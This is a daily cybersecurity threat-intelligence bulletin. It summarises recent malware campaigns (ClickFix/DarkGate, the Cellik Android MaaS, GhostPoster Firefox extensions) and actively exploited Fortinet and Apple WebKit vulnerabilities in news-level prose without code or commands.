Cyware Daily Threat Intelligence, December 17, 2025

Fixing a computer glitch is a natural instinct, but a new campaign is turning that helpful impulse into a liability. Attackers are exploiting a fake "Word Online" extension error to trick users into installing the DarkGate malware. Using the "ClickFix" social engineering technique, the campaign persuades victims to run malicious commands disguised as troubleshooting steps.

A new Android MaaS called Cellik allows criminals to create trojanized versions of legitimate Google Play Store apps. Because the malware retains the original app's interface and functionality, it is nearly impossible for users to detect the infection while it secretly captures screens and steals credentials in the background.

A feature often enabled by default has become a critical open door for attackers. Threat actors are actively exploiting two maximum-severity flaws in Fortinet FortiGate devices that allow for unauthenticated login bypass via the FortiCloud SSO feature. Attackers are already using these vulnerabilities to compromise admin accounts and export sensitive device configurations.

Top Malware Reported in the Last 24 Hours

ClickFix attack spreads DarkGate malware

A sophisticated social engineering campaign is exploiting a fake “Word Online” extension error message to distribute DarkGate malware. This attack utilizes the ClickFix technique, where users are tricked into executing malicious commands disguised as legitimate troubleshooting steps. Upon encountering a fraudulent message, victims are prompted to click a “How to fix” button, which triggers a malicious JavaScript snippet. This script decodes a hidden PowerShell command that downloads an HTA file named “dark.hta” from a compromised site. Once executed, the HTA file establishes communication with the attacker’s infrastructure, allowing for the deployment of additional malware and the theft of sensitive data. 

Cellik malware targets Google Play apps

Cellik is a new Android MaaS being marketed on underground forums, allowing attackers to create trojanized versions of legitimate apps from the Google Play Store. This malware retains the original app's interface and functionality, making it difficult for users to detect infections. Cellik offers a variety of capabilities, including real-time screen capture, notification interception, file exfiltration, and encrypted communication with command-and-control servers. It features a hidden browser mode that utilizes the victim's stored cookies and can inject malicious code into trusted apps to steal credentials. The malware's integration with the Google Play Store enables cybercriminals to select and modify popular apps, potentially bypassing Google Play Protect's security measures. 

GhostPoster campaign targets Firefox extensions

A new campaign named GhostPoster has been discovered, which conceals malicious JavaScript within the logos of Firefox extensions, affecting over 50,000 downloads. This hidden code allows attackers to monitor browser activity and establish a backdoor for high-privilege access, enabling them to hijack affiliate links, inject tracking codes, and commit click and ad fraud. Koi Security researchers identified 17 compromised extensions that utilize steganography to extract and execute the malware loader. The loader typically activates after 48 hours, fetching payloads from hardcoded domains, but it remains dormant most of the time to evade detection. The final payload can hijack affiliate commissions, strip security headers, bypass CAPTCHA protections, and inject invisible iframes for ad fraud. 

Top Vulnerabilities Reported in the Last 24 Hours

Newly disclosed Fortinet bugs under attack

Threat actors are actively exploiting two critical security flaws in Fortinet FortiGate devices, identified as CVE-2025-59718 and CVE-2025-59719, with CVSS scores of 9.8. These vulnerabilities allow for unauthenticated SSO login authentication bypass through crafted SAML messages, particularly when the FortiCloud SSO feature is enabled. Arctic Wolf reported observing malicious activity involving SSO logins on December 12, with attackers using specific IP addresses to compromise the "admin" account and export device configurations. While FortiCloud SSO is typically disabled by default, it is automatically enabled during FortiCare registration unless explicitly turned off. The ongoing campaign is still in its early stages, with a limited number of networks affected, and the nature of the threat appears opportunistic. The CISA has added one of the vulnerabilities to its Known Exploited Vulnerabilities catalog.

CISA adds Apple WebKit 0-day to KEV catalog

CISA has identified a critical zero-day vulnerability (CVE-2025-43529) in Apple’s WebKit rendering engine, which is actively being exploited in the wild. This severe use-after-free vulnerability affects multiple Apple platforms, including iOS, iPadOS, and macOS, as well as third-party applications that utilize WebKit for HTML processing. When users visit maliciously crafted web pages, attackers can exploit this flaw to trigger memory corruption, allowing them to execute arbitrary code with the privileges of the affected application.